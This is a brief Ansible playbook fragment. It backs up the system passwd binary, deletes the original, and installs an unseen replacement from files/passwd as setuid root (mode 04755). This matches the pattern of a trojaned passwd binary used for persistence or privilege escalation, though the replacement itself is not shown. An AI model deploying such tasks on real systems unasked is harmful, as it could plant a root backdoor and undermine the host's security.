- name: copy backup
  ansible.builtin.copy:
    src: /bin/passwd
    dest: /usr/share/passwd.bak
    mode: 0755
    remote_src: yes

- name: Remove original file
  ansible.builtin.file:
    path: /usr/bin/passwd
    state: absent
    
- name: copy binary
  ansible.builtin.copy:
    src: files/passwd
    dest: /bin/passwd
    mode: 04755
